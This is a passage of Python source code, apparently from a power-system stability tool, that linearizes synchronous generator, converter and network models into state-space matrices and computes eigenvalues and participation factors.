# I2 = Zmat_inv@np.array([Vx-Ex,Vy-Ey])
# I2 = Zmat_inv@np.array([Vx,Vy])-Zmat_inv@np.array([Ex,Ey])
# # Iq = (gpr.xdpp*(Vd-Edpp)-gpr.ra*(Vq-Eqpp))/(gpr.ra**2+gpr.xqpp*gpr.xdpp)
# Ix,Iy = vspr.Zvs_inv@np.array([vspr.V0*np.cos(phi)-Vx,vspr.V0*np.sin(phi)-Vy])
# TODO this might be nicer with dq transformation
# A = np.array([-1 + (Ex/(-Ix*vspr.X - Ix*vspr.R - Iy*vspr.R - Vy + Ex + vspr.Vy) + vspr.V0*(Ix*vspr.R - Iy*vspr.X - Iy*vspr.R + Vx + Ey - vspr.Vx)*np.sin(phi)/(-Ix*vspr.X - Ix*vspr.R - Iy*vspr.R - Vy + Ex + vspr.Vy)**2)/(1 + (Ix*vspr.R - Iy*vspr.X - Iy*vspr.R + Vx + Ey - vspr.Vx)**2/(-Ix*vspr.X - Ix*vspr.R - Iy*vspr.R - Vy + Ex + vspr.Vy)**2)])
A = np.array([[-1 + (vspr.V0 * np.cos(phi) / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + vspr.V0 * np.cos(phi) + vspr.Vy) + vspr.V0 * (
Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + vspr.V0 * np.sin(
phi) - vspr.Vx) * np.sin(phi) / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + vspr.V0 * np.cos(
phi) + vspr.Vy) ** 2) / (1 + (
Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + vspr.V0 * np.sin(phi) - vspr.Vx) ** 2 / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + vspr.V0 * np.cos(
phi) + vspr.Vy) ** 2)],
])
# B = np.array([1/((1 + (Ix*vspr.R - Iy*vspr.X - Iy*vspr.R + Vx + Ey - vspr.Vx)**2/(-Ix*vspr.X - Ix*vspr.R - Iy*vspr.R - Vy + Ex + vspr.Vy)**2)*(-Ix*vspr.X - Ix*vspr.R - Iy*vspr.R - Vy + Ex + vspr.Vy))])
B = np.array([[1 / ((1 + (Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - vspr.Vx) ** 2 / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ex + vspr.Vy) ** 2) * (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ex + vspr.Vy)),
(Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - vspr.Vx) / ((1 + (
Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - vspr.Vx) ** 2 / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ex + vspr.Vy) ** 2) * (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ex + vspr.Vy) ** 2)]])
C = -vspr.Zvs_inv @ np.array([[Ex], [Ey]])
D = vspr.Zvs_inv
return A, B, C, D
def sixth_order_model(x0, u0, gpr):
delta = x0[gpr.x_idx['d']] + np.pi / 2 # XXX delta is shifted 90 degrees due to different dq transformation
e_qpp = x0[gpr.x_idx['Eqpp']]
e_dpp = x0[gpr.x_idx['Edpp']]
v_d = u0[0][0]
v_q = u0[1][0]
i_d, i_q = gpr.Zg_inv @ np.array([v_d - e_dpp, v_q - e_qpp])
Ag_bar = np.array([[0, gpr.wn, 0, 0, 0, 0],
[0, -gpr.D / gpr.Tj, 0, -i_q / gpr.Tj, 0, -i_d / gpr.Tj],
[0, 0, -gpr.kd / gpr.Tdp, (gpr.kd - 1) / gpr.Tdp, 0, 0],
[0, 0, 1 / gpr.Tdpp, -1 / gpr.Tdpp, 0, 0],
[0, 0, 0, 0, -gpr.kq / gpr.Tqp, (gpr.kq - 1) / gpr.Tqp],
[0, 0, 0, 0, 1 / gpr.Tqpp, -1 / gpr.Tqpp]])
Big_bar = np.array([[0, 0],
[((gpr.xdpp - gpr.xqpp) * i_q - e_dpp) / gpr.Tj,
((gpr.xdpp - gpr.xqpp) * i_d - e_qpp) / gpr.Tj],
[1.1 / gpr.Tdp, 0],
[(gpr.xdpp - gpr.xdp) / gpr.Tdpp, 0],
[0, 0],
[0, (gpr.xqp - gpr.xqpp) / gpr.Tqpp]])
Bvg_bar = np.array([[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0]])
Pg_bar = np.array([[0, 0, 0, 0, 0, 1],
[0, 0, 0, 1, 0, 0]])
Zg_bar = np.array([[-gpr.ra, gpr.xqpp],
[-gpr.xdpp, -gpr.ra]])
Tg0 = np.array([[np.sin(delta), -np.cos(delta)],
[np.cos(delta), np.sin(delta)]])
Rvg = np.array([[v_q, 0, 0, 0, 0, 0],
[-v_d, 0, 0, 0, 0, 0]])
Rig = np.array([[i_q, 0, 0, 0, 0, 0],
[-i_d, 0, 0, 0, 0, 0]])
Cg = Tg0.T @ (np.linalg.inv(Zg_bar) @ (Rvg - Pg_bar) - Rig)
Dg = Tg0.T @ np.linalg.inv(Zg_bar) @ Tg0
Ag = Ag_bar + Big_bar @ np.linalg.inv(Zg_bar) @ (Rvg - Pg_bar) + Bvg_bar @ Rvg
Bg = (Big_bar @ np.linalg.inv(Zg_bar) + Bvg_bar) @ Tg0
return Ag, Bg, Cg, Dg
def sixth_order_model_avr_(x0, u0, gpr):
delta = x0[gpr.x_idx['d']] + np.pi / 2 # XXX delta is shifted 90 degrees due to different dq transformation
e_qpp = x0[gpr.x_idx['Eqpp']]
e_dpp = x0[gpr.x_idx['Edpp']]
v_d = u0[0] # [0]
v_q = u0[1] # [0]
i_d, i_q = gpr.Zg_inv @ np.array([v_d - e_dpp, v_q - e_qpp])
Ag_bar = np.array([[0, gpr.wn, 0, 0, 0, 0, 0, 0, 0],
[0, -gpr.D / gpr.Tj, 0, -i_q / gpr.Tj, 0, -i_d / gpr.Tj, 0, 0, 0],
[0, 0, -gpr.kd / gpr.Tdp, (gpr.kd - 1) / gpr.Tdp, 0, 0, 1 / gpr.Tdp, 0, 0],
[0, 0, 1 / gpr.Tdpp, -1 / gpr.Tdpp, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -gpr.kq / gpr.Tqp, (gpr.kq - 1) / gpr.Tqp, 0, 0, 0],
[0, 0, 0, 0, 1 / gpr.Tqpp, -1 / gpr.Tqpp, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -1 / gpr.Te, -gpr.Kc / gpr.Te, gpr.Kc / (gpr.Tc * gpr.Te)],
[0, 0, 0, 0, 0, 0, 0, -1 / gpr.Tm, 0],
[0, 0, 0, 0, 0, 0, 0, -1, 0],
])
Big_bar = np.array([[0, 0],
[(-e_dpp + gpr.xdpp * i_q - gpr.xqpp * i_q) / gpr.Tj,
(-e_qpp + gpr.xdpp * i_d - gpr.xqpp * i_d) / gpr.Tj],
[0, 0],
[(-gpr.xdp + gpr.xdpp) / gpr.Tdpp, 0],
[0, 0],
[0, (gpr.xqp - gpr.xqpp) / gpr.Tqpp],
[0, 0],
[0, 0],
[0, 0],
])
Bvg_bar = np.array([[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[v_d / (gpr.Tm * np.sqrt(v_d ** 2 + v_q ** 2)), v_q / (gpr.Tm * np.sqrt(v_d ** 2 + v_q ** 2))],
[0, 0],
])
Pg_bar = np.array([[0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0, 0]])
Zg_bar = np.array([[-gpr.ra, gpr.xqpp],
[-gpr.xdpp, -gpr.ra]])
Tg0 = np.array([[np.sin(delta), -np.cos(delta)],
[np.cos(delta), np.sin(delta)]])
Rvg = np.array([[v_q, 0, 0, 0, 0, 0, 0, 0, 0],
[-v_d, 0, 0, 0, 0, 0, 0, 0, 0]])
Rig = np.array([[i_q, 0, 0, 0, 0, 0, 0, 0, 0],
[-i_d, 0, 0, 0, 0, 0, 0, 0, 0]])
Cg = (Tg0.T @ (np.linalg.inv(Zg_bar) @ (
Rvg - Pg_bar) - Rig)) * gpr.Sn / gpr.Sb # TODO move *gpr.Sn/gpr.Sb outside of this function
Dg = (Tg0.T @ np.linalg.inv(Zg_bar) @ Tg0) * gpr.Sn / gpr.Sb
Ag = Ag_bar + Big_bar @ np.linalg.inv(Zg_bar) @ (Rvg - Pg_bar) + Bvg_bar @ Rvg
Bg = (Big_bar @ np.linalg.inv(Zg_bar) + Bvg_bar) @ Tg0
return Ag, Bg, Cg, Dg
def sixth_order_model_avr(x0, u0, gpr):
delta = x0[gpr.x_idx['d']] + np.pi / 2 # XXX delta is shifted 90 degrees due to different dq transformation
e_qpp = x0[gpr.x_idx['Eqpp']]
e_dpp = x0[gpr.x_idx['Edpp']]
v_d = u0[0] # [0]
v_q = u0[1] # [0]
i_d, i_q = gpr.Zg_inv @ np.array([v_d - e_dpp, v_q - e_qpp])
Ag_bar = np.array([[0, gpr.wn, 0, 0, 0, 0, 0, 0, 0],
[0, -gpr.D / gpr.Tj, 0, -i_q / gpr.Tj, 0, -i_d / gpr.Tj, 0, 0, 0],
[0, 0, -1 / gpr.Tdp, 0, 0, 0, 1 / gpr.Tdp, 0, 0],
[0, 0, 1 / gpr.Tdpp, -1 / gpr.Tdpp, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -1 / gpr.Tqp, 0, 0, 0, 0],
[0, 0, 0, 0, 1 / gpr.Tqpp, -1 / gpr.Tqpp, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -1 / gpr.Te, -gpr.Kc / gpr.Te, gpr.Kc / (gpr.Tc * gpr.Te)],
[0, 0, 0, 0, 0, 0, 0, -1 / gpr.Tm, 0],
[0, 0, 0, 0, 0, 0, 0, -1, 0],
])
Big_bar = np.array([[0, 0],
[(-e_dpp + gpr.xdpp * i_q - gpr.xqpp * i_q) / gpr.Tj,
(-e_qpp + gpr.xdpp * i_d - gpr.xqpp * i_d) / gpr.Tj],
[(-gpr.xd + gpr.xdp) / gpr.Tdp, 0],
[(-gpr.xdp + gpr.xdpp) / gpr.Tdpp, 0],
[0, (gpr.xq - gpr.xqp) / gpr.Tqp],
[0, (gpr.xqp - gpr.xqpp) / gpr.Tqpp],
[0, 0],
[0, 0],
[0, 0],
])
Bvg_bar = np.array([[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[v_d / (gpr.Tm * np.sqrt(v_d ** 2 + v_q ** 2)), v_q / (gpr.Tm * np.sqrt(v_d ** 2 + v_q ** 2))],
[0, 0],
])
Pg_bar = np.array([[0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0, 0]])
Zg_bar = np.array([[-gpr.ra, gpr.xqpp],
[-gpr.xdpp, -gpr.ra]])
Tg0 = np.array([[np.sin(delta), -np.cos(delta)],
[np.cos(delta), np.sin(delta)]])
Rvg = np.array([[v_q, 0, 0, 0, 0, 0, 0, 0, 0],
[-v_d, 0, 0, 0, 0, 0, 0, 0, 0]])
Rig = np.array([[i_q, 0, 0, 0, 0, 0, 0, 0, 0],
[-i_d, 0, 0, 0, 0, 0, 0, 0, 0]])
Cg = (Tg0.T @ (np.linalg.inv(Zg_bar) @ (
Rvg - Pg_bar) - Rig)) * gpr.Sn / gpr.Sb # TODO move *gpr.Sn/gpr.Sb outside of this function
Dg = (Tg0.T @ np.linalg.inv(Zg_bar) @ Tg0) * gpr.Sn / gpr.Sb
Ag = Ag_bar + Big_bar @ np.linalg.inv(Zg_bar) @ (Rvg - Pg_bar) + Bvg_bar @ Rvg
Bg = (Big_bar @ np.linalg.inv(Zg_bar) + Bvg_bar) @ Tg0
return Ag, Bg, Cg, Dg
def standard_model_linear(xo, uo, gpr):
delta = xo[gpr.x_idx['d']]
w = xo[gpr.x_idx['w']]
i_d = xo[gpr.x_idx['Id']]
i_q = xo[gpr.x_idx['Iq']]
psi_d = xo[gpr.x_idx['psi_d']]
psi_q = xo[gpr.x_idx['psi_q']]
psi_fd = xo[gpr.x_idx['psi_fd']]
psi_1d = xo[gpr.x_idx['psi_1d']]
psi_2q = xo[gpr.x_idx['psi_2q']]
psi_1q = xo[gpr.x_idx['psi_1q']]
Vd = uo[0]
Vq = uo[1]
Ag = np.array([[0, gpr.wn, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, (-gpr.dkd - gpr.dpe / w + gpr.dpe * (w - 1) / w ** 2) / gpr.Tj, -i_q / (gpr.Tj * gpr.cosn),
i_d / (gpr.Tj * gpr.cosn), 0, 0, 0, 0, psi_q / (gpr.Tj * gpr.cosn), -psi_d / (gpr.Tj * gpr.cosn), 0,
0, 0],
[0, gpr.wn * psi_q, 0, gpr.wn * w, 0, 0, 0, 0, gpr.ra * gpr.wn, 0, 0, 0, 0],
[0, -gpr.wn * psi_d, -gpr.wn * w, 0, 0, 0, 0, 0, 0, gpr.ra * gpr.wn, 0, 0, 0],
[0, 0, 0, 0, -gpr.rfd * gpr.wn * gpr.x1d_loop / gpr.xdet_d,
-gpr.rfd * gpr.wn * (-gpr.xad - gpr.xrld) / gpr.xdet_d, 0, 0, -gpr.kfd * gpr.rfd * gpr.wn, 0,
gpr.rfd * gpr.wn / gpr.xadu, 0, 0],
[0, 0, 0, 0, -gpr.r1d * gpr.wn * (-gpr.xad - gpr.xrld) / gpr.xdet_d,
-gpr.r1d * gpr.wn * gpr.xfd_loop / gpr.xdet_d, 0, 0, -gpr.k1d * gpr.r1d * gpr.wn, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -gpr.r1q * gpr.wn * gpr.x2q_loop / gpr.xdet_q,
-gpr.r1q * gpr.wn * (-gpr.xaq - gpr.xrlq) / gpr.xdet_q, 0, -gpr.k1q * gpr.r1q * gpr.wn, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -gpr.r2q * gpr.wn * (-gpr.xaq - gpr.xrlq) / gpr.xdet_q,
-gpr.r2q * gpr.wn * gpr.x1q_loop / gpr.xdet_q, 0, -gpr.k2q * gpr.r2q * gpr.wn, 0, 0, 0],
[0, gpr.wn * (-gpr.k1q * psi_1q - gpr.k2q * psi_2q + gpr.xqpp * i_q) / gpr.xdpp, 0, 0, gpr.wn * (
-gpr.k1d * gpr.r1d * (
-gpr.xad - gpr.xrld) / gpr.xdet_d - gpr.kfd * gpr.rfd * gpr.x1d_loop / gpr.xdet_d) / gpr.xdpp,
gpr.wn * (-gpr.k1d * gpr.r1d * gpr.xfd_loop / gpr.xdet_d - gpr.kfd * gpr.rfd * (
-gpr.xad - gpr.xrld) / gpr.xdet_d) / gpr.xdpp, -gpr.k1q * gpr.wn * w / gpr.xdpp,
-gpr.k2q * gpr.wn * w / gpr.xdpp,
gpr.wn * (-gpr.k1d ** 2 * gpr.r1d - gpr.kfd ** 2 * gpr.rfd - gpr.ra) / gpr.xdpp,
gpr.wn * gpr.xqpp * w / gpr.xdpp, gpr.kfd * gpr.rfd * gpr.wn / (gpr.xadu * gpr.xdpp), 0, 0],
[0, gpr.wn * (gpr.k1d * psi_1d + gpr.kfd * psi_fd - gpr.xdpp * i_d) / gpr.xqpp, 0, 0,
gpr.kfd * gpr.wn * w / gpr.xqpp, gpr.k1d * gpr.wn * w / gpr.xqpp, gpr.wn * (
-gpr.k1q * gpr.r1q * gpr.x2q_loop / gpr.xdet_q - gpr.k2q * gpr.r2q * (
-gpr.xaq - gpr.xrlq) / gpr.xdet_q) / gpr.xqpp, gpr.wn * (-gpr.k1q * gpr.r1q * (
-gpr.xaq - gpr.xrlq) / gpr.xdet_q - gpr.k2q * gpr.r2q * gpr.x1q_loop / gpr.xdet_q) / gpr.xqpp,
-gpr.wn * gpr.xdpp * w / gpr.xqpp,
gpr.wn * (-gpr.k1q ** 2 * gpr.r1q - gpr.k2q ** 2 * gpr.r2q - gpr.ra) / gpr.xqpp, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / gpr.Te, -gpr.Kc / gpr.Te, gpr.Kc / (gpr.Tc * gpr.Te)],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / gpr.Tm, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0],
])
Big = np.array([[0, 0],
[psi_q / (gpr.Tj * gpr.cosn), -psi_d / (gpr.Tj * gpr.cosn)],
[gpr.ra * gpr.wn, 0],
[0, gpr.ra * gpr.wn],
[-gpr.kfd * gpr.rfd * gpr.wn, 0],
[-gpr.k1d * gpr.r1d * gpr.wn, 0],
[0, -gpr.k1q * gpr.r1q * gpr.wn],
[0, -gpr.k2q * gpr.r2q * gpr.wn],
[gpr.wn * (-gpr.k1d ** 2 * gpr.r1d - gpr.kfd ** 2 * gpr.rfd - gpr.ra) / gpr.xdpp,
gpr.wn * gpr.xqpp * w / gpr.xdpp],
[-gpr.wn * gpr.xdpp * w / gpr.xqpp,
gpr.wn * (-gpr.k1q ** 2 * gpr.r1q - gpr.k2q ** 2 * gpr.r2q - gpr.ra) / gpr.xqpp],
[0, 0],
[0, 0],
[0, 0],
])
Bvg = np.array([[0, 0],
[0, 0],
[gpr.wn, 0],
[0, gpr.wn],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[-gpr.wn / gpr.xdpp, 0],
[0, -gpr.wn / gpr.xqpp],
[0, 0],
[Vd / (gpr.Tm * np.sqrt(Vd ** 2 + Vq ** 2)), Vq / (gpr.Tm * np.sqrt(Vd ** 2 + Vq ** 2))],
[0, 0],
])
Tg = np.array([[np.cos(delta), np.sin(delta)],
[-np.sin(delta), np.cos(delta)]])
# Zg = np.array([[-gpr.ra,gpr.xqpp],[-gpr.xdpp,-gpr.ra]])
Rvg = np.zeros((2, gpr.nx))
Rvg[0, gpr.x_idx['d']] = Vq
Rvg[1, gpr.x_idx['d']] = -Vd
Rig = np.zeros((2, gpr.nx))
Rig[0, gpr.x_idx['d']] = i_q
Rig[1, gpr.x_idx['d']] = -i_d
Pg = np.zeros((2, gpr.nx))
Pg[0, gpr.x_idx['Id']] = 1
Pg[1, gpr.x_idx['Iq']] = 1
Pg[0, gpr.x_idx['d']] = -i_q
Pg[1, gpr.x_idx['d']] = i_d
# Cg = Tg.T@(np.linalg.inv(Zg)@(Rvg-Pg)-Rig)
Cg = Tg.T @ Pg
# Cdc = np.zeros((1,gpr.nx))
# Cdc[0,gpr.x_idx['Idc']] = 1
Dg = np.zeros((2, 2))
A = Ag + Bvg @ Rvg
B = Bvg @ Tg
C = Cg * gpr.Sn / gpr.Sb
D = Dg
C @ xo
return A, B, C, D
def network_linear(npr):
for i in range(npr.n_br):
f = npr.f[i]
t = npr.t[i]
R = np.real(-1 / npr.Ybus[f, t])
L = np.imag(-1 / npr.Ybus[f, t])
s = 2 * (npr.n_bus + npr.n_br)
Nb = npr.n_bus * 2
A = np.zeros((s, s))
B = np.zeros((s, Nb))
for n in range(0, Nb, 2):
A[n, n + 1] = npr.wn
A[n + 1, n] = -npr.wn
ib = Nb
ii = 0
for n in range(npr.n_bus):
Csh = np.imag(npr.Ybus[n].sum())
if Csh <= 1e-6:
Csh = 0.001
for i, (f, t) in enumerate(zip(npr.f, npr.t)):
R = np.real(-1 / npr.Ybus[f, t])
L = np.imag(-1 / npr.Ybus[f, t])
if f == n:
A[2 * n, 2 * i + ib] = -npr.wn / Csh
A[2 * n + 1, 2 * i + ib + 1] = -npr.wn / Csh
if t == n:
A[2 * n, 2 * i + ib] = npr.wn / Csh
A[2 * n + 1, 2 * i + ib + 1] = npr.wn / Csh
A[2 * i + ib, 2 * n] = -npr.wn / L
A[2 * i + ib, 2 * f] = npr.wn / L
A[2 * i + ib, 2 * i + ib] = -R * npr.wn / L
A[2 * i + ib, 2 * i + ib + 1] = npr.wn
A[2 * i + ib + 1, 2 * n + 1] = -npr.wn / L
A[2 * i + ib + 1, 2 * f + 1] = npr.wn / L
A[2 * i + ib + 1, 2 * i + ib] = -npr.wn
A[2 * i + ib + 1, 2 * i + ib + 1] = -R * npr.wn / L
B[2 * n, 2 * n] = npr.wn / Csh
B[2 * n + 1, 2 * n + 1] = npr.wn / Csh
ii += 2
# ###
# Ybus_xy = np.zeros((Nb,Nb))
# for i in range(npr.n_bus):
# k = 2*i
# Ybus_xy[k,k] = npr.Ybus[i,i].real
# Ybus_xy[k,k+1] = -npr.Ybus[i,i].imag
# Ybus_xy[k+1,k] = npr.Ybus[i,i].imag
# Ybus_xy[k+1,k+1] = npr.Ybus[i,i].real
# for f,t in zip(npr.f,npr.t):
# f2 = 2*f
# t2 = 2*t
# Ybus_xy[f2,t2] = npr.Ybus[f,t].real
# Ybus_xy[f2,t2+1] = -npr.Ybus[f,t].imag
# Ybus_xy[f2+1,t2] = npr.Ybus[f,t].imag
# Ybus_xy[f2+1,t2+1] = npr.Ybus[f,t].real
# Ybus_xy[t2,f2] = npr.Ybus[t,f].real
# Ybus_xy[t2,f2+1] = -npr.Ybus[t,f].imag
# Ybus_xy[t2+1,f2] = npr.Ybus[t,f].imag
# Ybus_xy[t2+1,f2+1] = npr.Ybus[t,f].real
# ###
C = np.zeros((Nb, s))
v_inds = range(Nb)
C[v_inds, v_inds] = 1
# D = np.linalg.inv(Ybus_xy)
D = np.zeros((Nb, Nb))
return A, B, C, D
def calc_eigenvalues_old(x0, npr, models):
"""
Parameters
----------
x0 : ndarray
Initial state vector.
npr : network_parameters
Object containing network parameters.
models : list
List of models.
Returns
-------
lambda_1 : ndarray
Eigenvalue vector.
P_1 : ndarray
Participation factor array.
Amat : ndarray
System A matrix.
"""
inw = npr.x_ind
n_vsc = 0
n_gen = 0
size = (len(x0), len(x0))
A_tilde = np.zeros(size)
B_tilde = np.zeros(size)
C_tilde = np.zeros(size)
an, bn, cn, dn = network_linear(npr)
A_tilde[inw:, inw:] = an
for model in models:
if model.type == ModelType.VSC_1:
# break
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
Theta_pll = x0[model.x_ind + model.x_idx['Theta']]
vd = vx * np.cos(Theta_pll) + vy * np.sin(Theta_pll)
vq = -vx * np.sin(Theta_pll) + vy * np.cos(Theta_pll)
uo = np.array([vd, vq])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
avsc, bvsc, cvsc, dvsc = converter_linear(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = avsc
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bvsc
B_tilde[idx:idx + 2, idx:idx + 2] = bn[model.bus_ind:model.bus_ind + 2,
model.bus_ind:model.bus_ind + 2] @ dvsc
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2,
bus_idx:bus_idx + 2] @ cvsc
n_vsc += 1
elif model.type == ModelType.gen:
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
d = x0[model.x_ind + model.x_idx['d']]
vd = vx * np.cos(d) + vy * np.sin(d)
vq = -vx * np.sin(d) + vy * np.cos(d)
uo = np.array([vd, vq])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
ag, bg, cg, dg = sixth_order_model_avr(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = ag
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bg
B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dg
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ cg
n_gen += 1
Amat = A_tilde + B_tilde + C_tilde
lambda_1, Phi_1 = np.linalg.eig(Amat)
Psi_1 = np.linalg.inv(Phi_1)
P_1 = Phi_1 * Psi_1.T
# # Set Zero mode eigenvalues to zero # TODO need to confirm that this is ok!
# zm = np.where(abs(P_1) > 1)[1]
# lambda_1[zm] = 0
return lambda_1, P_1, Amat
def calc_eigenvalues(x0, npr, models, tol=1e-6):
"""
Parameters
----------
x0 : ndarray
Initial state vector.
npr : network_parameters
Object containing network parameters.
models : list
List of models.
Returns
-------
lambda_1 : ndarray
Eigenvalue vector.
P_1 : ndarray
Participation factor array.
Amat : ndarray
System A matrix.
"""
inw = npr.x_ind
n_vsc = 0
n_gen = 0
size = (len(x0), len(x0))
A_tilde = np.zeros(size)
B_tilde = np.zeros(size)
C_tilde = np.zeros(size)
an, bn, cn, dn = network_linear(npr)
A_tilde[inw:, inw:] = an
for model in models:
if model.type == ModelType.VSC_1:
# break
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
if not model.x_dc == -1:
vdc = x0[model.x_dc]
else:
vdc = 1
Theta_pll = x0[model.x_ind + model.x_idx['Theta']]
vd = vx * np.cos(Theta_pll) + vy * np.sin(Theta_pll)
vq = -vx * np.sin(Theta_pll) + vy * np.cos(Theta_pll)
uo = np.array([vd, vq, vdc])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
# if model.ctrl == CtrlMode.P_Vac:
# avsc,bacvsc,bdcvsc,cacvsc,cdcvsc,dvsc = vsc_linear_1(xo,uo,model)
# # A,B,Bvdc,C,Cdc,D
# # break
# # B_tilde[model.x_ind:model.x_ind+model.nx,model.x_dc:model.x_dc+1]=bdcvsc # TODO add DC side
# # C_tilde[idx:idx+1,model.x_ind:model.x_ind+model.nx]=bdcvsc
# elif model.ctrl == CtrlMode.Vdc_Q:
# avsc,bacvsc,bdcvsc,cacvsc,cdcvsc,dvsc = vsc_linear_2(xo,uo,model)
# elif 'Idc' in model.x_idx:
# avsc,bacvsc,cacvsc,dvsc = converter_linear(xo,uo,model)
# else:
# # avsc,bvsc,cvsc,dvsc = converter_linear(xo,uo,model)
# avsc,bacvsc,cacvsc,dvsc = c_linear0(xo,uo,model)
# avsc,bacvsc,cacvsc,dvsc = converter_linear(xo,uo,model)
avsc, bacvsc, cacvsc, dvsc = model.abcd_linear(xo, uo)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = avsc
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bacvsc
B_tilde[idx:idx + 2, idx:idx + 2] = bn[model.bus_ind:model.bus_ind + 2,
model.bus_ind:model.bus_ind + 2] @ dvsc
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2,
bus_idx:bus_idx + 2] @ cacvsc
# B_tilde[model.x_ind:model.x_ind+model.nx,inw:] = bacvsc@cn[bus_idx:bus_idx+2] # XXX alternative way
# if not model.x_dc == -1:
# B_tilde[model.x_ind:model.x_ind+model.nx,[model.x_dc]]=bdcvsc
n_vsc += 1
elif model.type == ModelType.GEN_ORD_6:
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
d = x0[model.x_ind + model.x_idx['d']]
vd = vx * np.cos(d) + vy * np.sin(d)
vq = -vx * np.sin(d) + vy * np.cos(d)
uo = np.array([vd, vq])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
ag, bg, cg, dg = sixth_order_model_avr(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = ag
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bg
B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dg
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ cg
n_gen += 1
elif model.type == ModelType.GEN_2_2:
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
d = x0[model.x_ind + model.x_idx['d']]
vd = vx * np.cos(d) + vy * np.sin(d)
vq = -vx * np.sin(d) + vy * np.cos(d)
uo = np.array([vd, vq])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
# ag,bg,cg,dg = standard_model_linear(xo,uo,model)
ag, bg, cg, dg = model.abcd_linear(xo, uo)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = ag
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bg
B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dg
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ cg
n_gen += 1
elif model.type == ModelType.DC_LINE:
# break
mf = models[model.f]
mt = models[model.t]
If = -x0[mf.x_ind + mf.x_idx['Idc']] * mf.Sn / npr.Sb
It = x0[mt.x_ind + mt.x_idx['Idc']] * mt.Sn / npr.Sb
It = -If # TODO check the initialization. In steady state If=-It (if G=0)
uo = np.array([If, It])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
acb, bcb, ccb, dcb = dc_cable_linear(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = acb
# cvsc[np.array([0,1]),np.array([mf.x_idx['Idc'],mt.x_idx['Idc']])]
# B_tilde[model.x_ind:model.x_ind+model.nx,idx:idx+2]=bcb
# B_tilde[idx:idx+2,idx:idx+2]=bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@dcb
cvsc = np.zeros((1, mf.nx))
cvsc[0, mf.x_idx['Idc']] = 1
